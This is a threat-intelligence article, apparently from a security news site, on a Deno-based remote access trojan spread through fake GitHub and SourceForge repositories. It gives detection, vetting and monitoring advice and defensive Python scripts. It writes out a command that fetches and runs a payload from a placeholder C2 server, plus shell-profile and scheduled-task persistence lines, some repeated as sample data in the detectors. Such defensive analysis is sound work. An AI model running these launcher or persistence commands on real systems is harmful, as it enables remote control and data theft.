Threat actors are distributing a Deno-based remote access trojan (RAT) through fake software repositories on GitHub and SourceForge. The malicious packages masquerade as legitimate development tools and productivity software and target developers and other technically skilled users. The RAT gives attackers comprehensive remote access, including keylogging, screen capture, file manipulation and command execution. Organizations should enforce strict software vetting procedures and monitor for indicators of compromise to defend against this supply chain threat.
Introduction
The open-source community has long been celebrated as a cornerstone of collaborative software development, but this trust-based ecosystem is increasingly exploited by sophisticated threat actors. A new campaign has emerged leveraging GitHub and SourceForge platforms to distribute malicious software packages containing Deno RAT, a powerful remote access trojan built on the Deno JavaScript/TypeScript runtime.
This distribution method is a concerning evolution in malware delivery. By hosting payloads on trusted development platforms and disguising them as legitimate tools, attackers are compromising developer workstations and, through them, potentially entire software supply chains. The choice of Deno, a runtime marketed as secure by default, shows how readily threat actors adopt newer technologies that traditional detection rules do not yet cover; the runtime's sandbox offers no protection once the victim launches the script with blanket permissions.
Background & Context
GitHub and SourceForge have established themselves as essential platforms for software distribution and open-source collaboration, hosting millions of projects accessed by developers worldwide. This trust and ubiquity make them attractive vectors for malware distribution, as users often lower their defensive posture when downloading from these platforms.
Deno, created by Node.js author Ryan Dahl, is a runtime for JavaScript and TypeScript that is secure by default: a script gets no file, network, environment or subprocess access unless the user launching it grants those permissions. That protection exists for the person running the script, not against them; a trojanized installer that starts its own script with --allow-all gets everything the user can do. The same runtime has therefore been turned into RAT tooling that benefits from Deno's single-binary, cross-platform distribution and from lower detection rates than established malware frameworks.
Remote access trojans remain one of the most dangerous malware categories, providing attackers with persistent backdoor access to compromised systems. Unlike ransomware or cryptominers with obvious symptoms, RATs operate stealthily in the background, exfiltrating data and maintaining long-term persistence for reconnaissance and lateral movement operations.
Previous campaigns have used similar tactics, including the distribution of trojanized npm packages, malicious PyPI libraries, and compromised software installers. This Deno RAT campaign builds on these established techniques while exploiting the growing Deno ecosystem’s relative immaturity in security tooling and awareness.
Technical Breakdown
The Deno RAT distribution campaign employs social engineering combined with technical obfuscation to compromise targets. Threat actors create convincing repository profiles complete with documentation, readme files, and even fake star counts to establish legitimacy.
Distribution Mechanism
The malicious repositories typically impersonate popular development tools, utilities, or productivity applications. Common lures include:
- Code editors and IDE extensions
- System optimization tools
- File conversion utilities
- Development frameworks and libraries
Once a user downloads and executes the fake software, the installation package deploys the Deno RAT alongside or instead of any promised functionality. The malware may include actual benign software functionality to avoid immediate suspicion.
Deno RAT Capabilities
The Deno-based RAT leverages the runtime’s capabilities to implement comprehensive surveillance and control features:
Remote Command Execution: The RAT establishes a reverse shell connection, allowing attackers to execute arbitrary commands with the privileges of the infected user.
# Example command structure used by the RAT
deno run --allow-all --unstable https://[C2-server]/payload.ts
Two details of that line matter for defenders. --allow-all (short form -A) grants file system, network, environment and subprocess access in one flag, so no permission prompt ever appears. The remote module specifier means the payload is fetched from the operator's server on first run and then cached locally in the Deno module cache (DENO_DIR, by default under the user's cache directory), so the cache is a forensic artifact worth collecting: it preserves both the fetched code and the URL it came from.
Keylogging: Captures keystroke data including credentials, sensitive communications, and intellectual property typed by victims.
Screen Capture: Periodically captures screenshots or streams screen content to operators for reconnaissance.
File Operations: Provides full file system access for exfiltration, modification, and deployment of additional payloads.
Persistence Mechanisms: The RAT establishes persistence through various methods:
# Common persistence technique on Linux/macOS (.bashrc only runs for interactive bash shells; zsh users would see ~/.zshrc or ~/.zprofile targeted instead)
echo 'deno run --allow-all ~/.config/deno/startup.ts' >> ~/.bashrc
# Windows scheduled task creation
schtasks /create /tn "DenoUpdate" /tr "deno run --allow-all C:\Users\[user]\AppData\deno_update.ts" /sc onlogon
Communication: The malware communicates with command-and-control (C2) infrastructure over HTTPS, blending with legitimate traffic and potentially implementing domain generation algorithms (DGA) for resilience.
Obfuscation Techniques
The malware authors employ several obfuscation methods to evade detection:
- Code minification and variable name randomization
- Multi-stage payload delivery
- String encoding and runtime decryption
- Launching with --allow-all so that no per-capability permission prompt reveals what the script is about to do
- Use of compromised or bulletproof hosting for C2 servers
Impact & Risk Assessment
The distribution of Deno RAT through trusted development platforms poses significant risks across multiple dimensions:
Individual Developer Impact: Compromised workstations provide attackers with access to source code repositories, credentials stored in development environments, API keys, and intellectual property. Developers often possess elevated privileges and access to critical infrastructure, amplifying the potential damage.
Supply Chain Risk: When developer systems are compromised, threat actors can inject malicious code into legitimate software projects, potentially affecting downstream users and customers. This represents a supply chain attack vector similar to high-profile incidents like SolarWinds and Codecov.
Enterprise Exposure: Organizations whose developers install compromised software face data breaches, intellectual property theft, and potential regulatory compliance violations. The lateral movement capabilities of RATs enable attackers to pivot from initial footholds to critical business systems.
Platform Trust Erosion: Continued abuse of GitHub and SourceForge for malware distribution damages trust in open-source ecosystems, potentially hindering legitimate collaboration and innovation.
The severity is particularly high for organizations in technology, finance, healthcare, and government sectors where developers handle sensitive information and have access to production environments.
Vendor Response
GitHub and SourceForge have implemented various security measures to combat malicious repository distribution, though gaps remain in enforcement and detection.
GitHub’s security team actively monitors for malicious repositories using automated scanning and community reporting mechanisms. Identified malicious accounts are suspended, and repositories are removed. However, the sheer volume of daily repository creation makes comprehensive real-time monitoring challenging.
SourceForge has similarly increased scrutiny of uploaded projects, implementing malware scanning and manual review processes for suspicious submissions. Both platforms have established abuse reporting channels and publish transparency reports on security actions taken.
The Deno project maintainers have acknowledged the issue and emphasized that Deno's permission model requires explicit consent for dangerous operations. That protection only holds when the launcher withholds permissions: a script started with --allow-all (or -A) runs with the full privileges of the user, and a native installer that drops the RAT executes outside Deno's sandbox altogether. In practice users frequently grant broad permissions without understanding what they are giving away.
Security vendors have begun updating their detection signatures to identify Deno RAT variants, with varying success rates depending on the specific obfuscation techniques employed by threat actors.
Mitigations & Workarounds
Organizations and individual developers should implement multiple defensive layers to protect against this threat:
Software Vetting Procedures
Establish strict policies for downloading and executing software:
- Verify repository authenticity through multiple indicators (age, contributor history, community engagement)
- Check for verified badges and official organization accounts
- Review commit history for suspicious activity
- Examine download statistics and community feedback
- Cross-reference official project websites before downloading
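The indicators in this list can be checked mechanically before anyone downloads anything. The following script is an added example, not code from the article or from either platform; its field names follow what GitHub's REST API returns for a repository (created_at, stargazers_count and so on) plus values you would gather yourself (contributor and commit counts, release asset names, README text). The two records and every threshold are constructed assumptions for illustration.

```python
"""Score a repository's public metadata for signs of a malware lure.

Added example, not code from the article or from GitHub/SourceForge. The
records and thresholds below are constructed assumptions; tune them against
repositories you already trust."""
from datetime import datetime, timezone
from difflib import SequenceMatcher

NOW = datetime(2025, 6, 1, tzinfo=timezone.utc)  # fixed reference date so results are reproducible
BINARY_SUFFIXES = (".exe", ".msi", ".dmg", ".pkg", ".zip", ".7z", ".rar")


def _age_days(iso_ts: str) -> float:
    return (NOW - datetime.fromisoformat(iso_ts.replace("Z", "+00:00"))).total_seconds() / 86400


def _looks_like(name: str, known: str) -> bool:
    """Typosquat check: near-identical to, but not the same as, a well-known project name."""
    return name != known and SequenceMatcher(None, name, known).ratio() >= 0.75


def assess_repo(meta: dict) -> tuple[int, list[str]]:
    """Return (risk_score, reasons); higher is more suspicious."""
    score, reasons = 0, []
    repo_age = _age_days(meta["created_at"])
    owner_age = _age_days(meta["owner_created_at"])
    stars = meta.get("stargazers_count", 0)

    if repo_age < 30 and stars > 200:                        # popularity that arrived too fast
        score += 3
        reasons.append(f"{stars} stars on a {repo_age:.0f}-day-old repository")
    if owner_age < 60 and meta.get("owner_public_repos", 0) <= 1:
        score += 2
        reasons.append("owner account is new and has no other projects")
    if meta.get("contributors", 0) <= 1 and meta.get("commit_count", 0) < 10:
        score += 2
        reasons.append("single contributor with fewer than 10 commits")
    binaries = [a for a in meta.get("release_assets", []) if a.lower().endswith(BINARY_SUFFIXES)]
    if binaries and not meta.get("has_source_tag", False):    # installers with no tagged source
        score += 3
        reasons.append("binary-only release assets: " + ", ".join(binaries))
    for known in meta.get("known_project_names", []):
        if _looks_like(meta["name"].lower(), known.lower()):
            score += 3
            reasons.append(f"name resembles well-known project '{known}'")
    readme = meta.get("readme", "").lower()
    if "disable" in readme and any(w in readme for w in ("antivirus", "defender", "smartscreen")):
        score += 4
        reasons.append("README asks the user to disable endpoint protection")
    return score, reasons


def verdict(meta: dict) -> str:
    score, _ = assess_repo(meta)
    return "block" if score >= 6 else "review" if score >= 3 else "ok"


# --- constructed sample records (not real repositories) -----------------------
LEGIT = {
    "name": "prettier", "created_at": "2017-01-10T00:00:00Z",
    "owner_created_at": "2016-11-01T00:00:00Z", "owner_public_repos": 12,
    "stargazers_count": 48000, "contributors": 600, "commit_count": 9000,
    "release_assets": [], "has_source_tag": True, "known_project_names": ["prettier"],
    "readme": "Opinionated code formatter. Install with npm install prettier.",
}
LURE = {
    "name": "prettier-pro", "created_at": "2025-05-15T00:00:00Z",
    "owner_created_at": "2025-05-10T00:00:00Z", "owner_public_repos": 1,
    "stargazers_count": 1200, "contributors": 1, "commit_count": 3,
    "release_assets": ["PrettierPro-Setup.exe"], "has_source_tag": False,
    "known_project_names": ["prettier"],
    "readme": "Please disable Windows Defender before running the installer.",
}

if __name__ == "__main__":
    for repo in (LEGIT, LURE):
        score, reasons = assess_repo(repo)
        print(f"{repo['name']}: score={score} verdict={verdict(repo)}")
        for r in reasons:
            print("  -", r)
```

To use it against live data, fill the dict from the repository, contributors and releases endpoints of the API. Treat the "review" band as a hand-off to a human rather than an automatic denial: young but legitimate projects trip the age rules as well, and the point is to force a conscious decision before an installer runs.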
Permission Management
When using Deno applications, carefully review permission requests:
# Avoid running with the --allow-all (-A) flag
# Instead, grant only the specific permissions the script needs
deno run --allow-net=specific-domain.com --allow-read=/specific/path script.ts
Run this way, a script that tries to reach any other host or read outside the listed path fails with a permission error instead of succeeding silently, which is exactly the behaviour a RAT launched with --allow-all never triggers.
System Hardening
Implement principle of least privilege:
- Use standard user accounts for development work
- Implement application whitelisting where feasible
- Enable endpoint detection and response (EDR) solutions
- Maintain up-to-date antivirus and anti-malware software
Network Segmentation
Isolate development environments from production systems and implement strict egress filtering to block unauthorized C2 communications.
Detection & Monitoring
Effective detection requires monitoring multiple indicators across endpoints and networks:
Endpoint Indicators
Monitor for suspicious Deno process execution:
# Search for Deno processes launched with blanket permissions (--allow-all or its short form -A)
ps -eo pid,user,args | grep -Ei 'deno.*(--allow-all|(^| )-A( |$))' | grep -v grep
# Check for Deno binaries outside the expected install locations
find / -type f -name "deno" 2>/dev/null
Bear in mind that deno compile produces a standalone executable with the runtime embedded, so a compiled dropper need not contain "deno" in its process name or path at all; treat these searches as a first pass and weight the persistence, network and file system indicators below more heavily.
Examine persistence mechanisms:
- Startup scripts and shell configuration files
- Scheduled tasks and cron jobs
- Registry run keys (Windows)
- Launch agents and daemons (macOS)
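The persistence mechanisms shown earlier (a deno run line appended to a shell startup file, a cron or scheduled-task entry) and the endpoint indicators above can be checked with one routine that classifies every Deno command line it finds, applying the same test the Permission Management section recommends: blanket permissions, remote module specifiers and scripts dropped in hidden or temporary directories. The script below is an added example, not code from the article; the startup-file contents, crontab and ps-style lines are constructed samples, and the rules are assumptions to tune.

```python
"""Scan shell startup files, a crontab and a process listing for Deno
invocations that look like RAT launchers.

Added example, not code from the article: the startup-file contents, crontab
and ps-style lines are constructed samples, and the rules encode the
indicators described above (blanket permissions, remote module specifiers,
scripts dropped in hidden or temporary directories) as assumptions to tune."""
import re
import shlex

SUBCOMMANDS = {"run", "eval", "task"}
SHELL_TOKENS = {"&", "&&", ";", "|", "||"}
# "deno run ...", optionally with a path prefix, at start of line or after a shell separator
DENO_CMD = re.compile(r"(?:^|[\s;&|])(?:\S*/)?deno\s+(?:run|eval|task)\b", re.IGNORECASE)
REMOTE_SPEC = re.compile(r"^https?://", re.IGNORECASE)
HIDDEN_PATH = re.compile(r"(?:^|/)\.[^/]+/")  # a path component starting with '.', e.g. ~/.config/


def inspect_deno_cmdline(cmdline: str) -> list[str]:
    """Return why a command line is suspicious (empty list if it is not)."""
    reasons: list[str] = []
    if not DENO_CMD.search(cmdline):
        return reasons
    try:
        argv = shlex.split(cmdline)
    except ValueError:            # unbalanced quotes: fall back to a naive split
        argv = cmdline.split()
    start = next((i for i, a in enumerate(argv) if a.rsplit("/", 1)[-1].lower() == "deno"), None)
    if start is None:             # "deno run" only appeared inside a quoted string
        return reasons
    rest = argv[start + 1:]
    flags = [a for a in rest if a.startswith("-")]
    targets = [a for a in rest if not a.startswith("-") and a not in SUBCOMMANDS | SHELL_TOKENS]
    if any(f in ("--allow-all", "-A") for f in flags):
        reasons.append("blanket permissions (--allow-all/-A) disable the sandbox")
    if any(f.startswith("--unstable") for f in flags):
        reasons.append("unstable APIs requested")
    for t in targets:
        if REMOTE_SPEC.match(t):
            reasons.append(f"remote module executed at runtime: {t}")
        elif HIDDEN_PATH.search(t) or "AppData" in t or t.startswith("/tmp/"):
            reasons.append(f"script in a hidden or temporary user directory: {t}")
    return reasons


def scan(startup_files: dict[str, str], crontab: str, ps_lines: list[str]) -> list[dict]:
    """Apply inspect_deno_cmdline to each persistence location and to live processes."""
    findings = []
    for path, content in startup_files.items():
        for n, line in enumerate(content.splitlines(), 1):
            if reasons := inspect_deno_cmdline(line):
                findings.append({"source": f"{path}:{n}", "cmd": line.strip(), "reasons": reasons})
    for n, line in enumerate(crontab.splitlines(), 1):
        fields = line.split()
        if len(fields) < 6 or line.lstrip().startswith("#"):
            continue                          # blank, comment or VAR=value line
        cmd = " ".join(fields[5:])            # drop the five schedule fields
        if reasons := inspect_deno_cmdline(cmd):
            findings.append({"source": f"crontab:{n}", "cmd": cmd, "reasons": reasons})
    for line in ps_lines:
        parts = line.split(None, 2)           # user pid args, as from: ps -eo user,pid,args
        if len(parts) == 3 and (reasons := inspect_deno_cmdline(parts[2])):
            findings.append({"source": f"pid {parts[1]}", "cmd": parts[2], "reasons": reasons})
    return findings


# --- constructed sample inputs (not real artifacts) ---------------------------
SAMPLE_STARTUP = {
    "~/.bashrc": "export PATH=$HOME/bin:$PATH\nalias ll='ls -la'\n"
                 "deno run --allow-all ~/.config/deno/startup.ts &\n",
    "~/.zshrc": "autoload -Uz compinit && compinit\n",
}
SAMPLE_CRONTAB = (
    "*/5 * * * * /home/dev/.local/bin/deno run -A --unstable https://cdn.example.invalid/u.ts\n"
    "0 3 * * * /usr/bin/backup.sh\n"
)
SAMPLE_PS = [
    "dev 4123 deno run --allow-net=api.github.com --allow-read=./src ./build.ts",  # legitimate, scoped
    "dev 4987 /home/dev/.cache/deno/deno run -A /tmp/.x/agent.ts",
    "root 1 /sbin/init",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_STARTUP, SAMPLE_CRONTAB, SAMPLE_PS):
        print(f"[{f['source']}] {f['cmd']}")
        for r in f["reasons"]:
            print("    -", r)
```

On a real host, feed it the expanded contents of the startup files, the output of crontab -l for each user, and ps -eo user,pid,args; on Windows the same classifier applies to the command strings from schtasks /query /fo LIST /v and the Run keys. Expect some noise from developers who habitually run their own tooling with -A; the remote-specifier and hidden-path reasons are the ones that rarely have an innocent explanation.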
Network Indicators
Monitor for:
- Unexpected HTTPS connections to unusual domains
- High-frequency beaconing patterns consistent with C2 communication
- Data exfiltration to cloud storage services
- Connections to known malicious IP ranges
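Of these, the beaconing pattern is the one that survives HTTPS and changing domains, because it is a property of timing rather than content. The following script is an added example, not from the article: it groups outbound connections by process and destination and flags groups whose inter-arrival gaps are too regular to be human. The connection records are constructed (destinations use the 203.0.113.0/24 documentation range) in the shape a simple endpoint sensor might emit, and the thresholds are assumptions to tune against your own baseline.

```python
"""Flag periodic outbound connections (C2 beaconing) per process and destination.

Added example, not from the article: the connection records are constructed
(destinations use the 203.0.113.0/24 documentation range) and the thresholds
are assumptions to tune against your own traffic baseline."""
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from statistics import mean, pstdev

MIN_CONNECTIONS = 8   # fewer events than this is too little evidence of periodicity
MAX_JITTER_CV = 0.2   # stdev/mean of inter-arrival gaps; beacons are regular, humans are not


def parse_record(line: str) -> tuple[datetime, str, str]:
    """'2025-06-01T10:00:00Z proc=deno dst=203.0.113.10:443' -> (timestamp, proc, dst)."""
    ts_text, *kv = line.split()
    fields = dict(item.split("=", 1) for item in kv)
    return datetime.fromisoformat(ts_text.replace("Z", "+00:00")), fields["proc"], fields["dst"]


def find_beacons(lines: list[str]) -> list[dict]:
    """Group connections by (process, destination) and report regular check-ins."""
    by_key: dict[tuple[str, str], list[datetime]] = defaultdict(list)
    for line in lines:
        ts, proc, dst = parse_record(line)
        by_key[(proc, dst)].append(ts)
    hits = []
    for (proc, dst), stamps in by_key.items():
        if len(stamps) < MIN_CONNECTIONS:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        period = mean(gaps)
        if period <= 0:
            continue                           # everything in the same second: a burst, not a beacon
        cv = pstdev(gaps) / period             # coefficient of variation of the gaps
        if cv < MAX_JITTER_CV:
            hits.append({"proc": proc, "dst": dst, "count": len(stamps),
                         "period_s": round(period, 1), "jitter_cv": round(cv, 3)})
    return hits


# --- constructed sample log -----------------------------------------------------
def _line(t: datetime, proc: str, dst: str) -> str:
    return f"{t.strftime('%Y-%m-%dT%H:%M:%SZ')} proc={proc} dst={dst}"


_START = datetime(2025, 6, 1, 10, 0, tzinfo=timezone.utc)
SAMPLE_LOG = (
    # RAT check-in about every 60 s with a few seconds of jitter
    [_line(_START + timedelta(seconds=60 * i + j), "deno", "203.0.113.10:443")
     for i, j in enumerate([0, 2, -1, 3, 0, -2, 1, 2, -1, 0, 1, -2])]
    # a package install: a burst of requests, then a couple of stragglers
    + [_line(_START + timedelta(seconds=s), "npm", "203.0.113.20:443")
       for s in (0, 1, 1, 2, 2, 3, 40, 41, 600, 900)]
    # three evenly spaced requests: too few to judge
    + [_line(_START + timedelta(seconds=s), "curl", "203.0.113.30:443") for s in (0, 60, 120)]
)

if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG):
        print(hit)
```

Operators who add deliberate sleep jitter will push the coefficient of variation up, so complement this with a second pass over a longer window (hours rather than minutes) and with the other indicators in the list: a regular cadence from a process that should never talk to the internet at all is damning even when the jitter test alone is inconclusive.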
# Monitor network connections from Deno processes (Linux; run as root so the owning process is shown)
sudo ss -tnp | grep -i deno
# Legacy equivalent on systems without ss
sudo netstat -anp | grep -i deno
File System Monitoring
Watch for:
- Unexpected TypeScript/JavaScript files in system directories
- Modifications to shell configuration files
- Creation of hidden directories in user profiles
Implement file integrity monitoring (FIM) for critical directories and leverage security information and event management (SIEM) solutions to correlate indicators across the environment.
Best Practices
Protecting against fake software distribution requires comprehensive security hygiene:
Software Supply Chain Security:
- Maintain an approved software inventory
- Use package managers with integrity verification
- Implement software composition analysis (SCA) tools
- Conduct security reviews before adopting new tools
Security Awareness Training:
- Educate developers about social engineering tactics
- Promote skepticism when downloading software, even from trusted platforms
- Establish clear reporting procedures for suspicious software
Incident Response Preparedness:
- Maintain current incident response playbooks
- Conduct regular tabletop exercises
- Establish procedures for compromised developer credential rotation
- Implement code review processes to detect injected malicious code
Runtime Security:
- Deploy EDR solutions on all developer workstations
- Implement application behavior monitoring
- Use sandboxing for testing untrusted software
- Enable comprehensive logging for forensic capability
Verification Procedures:
Always verify software authenticity through official channels before downloading. Check digital signatures where the project publishes them, compare checksums against values obtained from a channel independent of the download itself (a checksum file served next to a tampered installer proves nothing), and consult the official documentation for the recommended download sources.
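The checksum comparison is worth automating so that it cannot be skipped. The script below is an added example, not from the article: it parses the sha256sum(1) file format, streams the artifact, and refuses both a mismatch and a file the sums list does not mention. The artifact bytes and the sums file are constructed in a temporary directory so it runs offline.

```python
"""Verify a downloaded artifact against a SHA256SUMS file before running it.

Added example, not from the article: the artifact bytes and the sums file are
constructed in a temporary directory so the script runs offline. The sums file
must come from a channel you trust independently of the download itself."""
import hashlib
import hmac
import os
import tempfile


def sha256_file(path: str) -> str:
    """Stream the file so large installers do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def parse_sums(text: str) -> dict[str, str]:
    """Parse sha256sum(1) output: '<hex>  <name>' (text mode) or '<hex> *<name>' (binary mode)."""
    sums = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, name = line.partition(" ")
        sums[name.strip().lstrip("*")] = digest.lower()
    return sums


def verify(path: str, sums_text: str) -> tuple[bool, str]:
    """Return (ok, message). Refuses files the sums file does not list at all."""
    name = os.path.basename(path)
    expected = parse_sums(sums_text).get(name)
    if expected is None:
        return False, f"{name}: not listed in SHA256SUMS, refusing to trust it"
    actual = sha256_file(path)
    # compare_digest is not required for a public digest but avoids the leaky '==' habit
    if hmac.compare_digest(actual, expected):
        return True, f"{name}: checksum OK"
    return False, f"{name}: MISMATCH expected {expected[:12]}... got {actual[:12]}..."


def demo() -> list[tuple[bool, str]]:
    """Three constructed cases: intact archive, swapped installer, unlisted file."""
    with tempfile.TemporaryDirectory() as d:
        archive = os.path.join(d, "tool-1.0.0.tar.gz")
        installer = os.path.join(d, "tool-1.0.0-setup.exe")
        with open(archive, "wb") as f:
            f.write(b"constructed release archive\n")
        with open(installer, "wb") as f:
            f.write(b"constructed file an attacker swapped in\n")
        # the publisher's sums: the real archive digest, and the digest of the ORIGINAL installer
        original_installer_digest = hashlib.sha256(b"constructed original installer\n").hexdigest()
        sums = (f"{sha256_file(archive)}  tool-1.0.0.tar.gz\n"
                f"{original_installer_digest} *tool-1.0.0-setup.exe\n")
        return [verify(archive, sums), verify(installer, sums),
                verify(os.path.join(d, "extra.zip"), sums)]


if __name__ == "__main__":
    for ok, msg in demo():
        print("PASS" if ok else "FAIL", msg)
```

Pair this with signature verification when the project signs its sums file; a checksum only proves the download matches what the publisher of the sums file intended, so the trust question moves to where that file came from.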
Key Takeaways
- Threat actors are actively exploiting trust in GitHub and SourceForge to distribute Deno RAT through fake software repositories
- The Deno-based RAT provides comprehensive remote access capabilities including keylogging, screen capture, and command execution
- Developer workstation compromise presents significant supply chain risks beyond individual impact
- Multi-layered defenses including software vetting, permission management, and monitoring are essential
- Organizations must implement strict software procurement policies and security awareness programs
- Deno’s permission model provides security benefits only when users avoid blanket permission grants
- Continuous monitoring for behavioral indicators and network anomalies enables timely detection
- The campaign demonstrates evolving threat actor sophistication in leveraging modern development technologies
References
- GitHub Security Advisory Database – https://github.com/advisories
- SourceForge Security and Abuse Policy – https://sourceforge.net/p/forge/documentation/Security%20and%20Abuse/
- Deno Security Best Practices – https://deno.land/manual/getting_started/permissions
- MITRE ATT&CK Framework – T1195 (Supply Chain Compromise) – https://attack.mitre.org/techniques/T1195/
- NIST Software Supply Chain Security Guidance – https://csrc.nist.gov/publications
Stay updated at https://cydhaal.com — Your Daily Dose of Cyber Intelligence.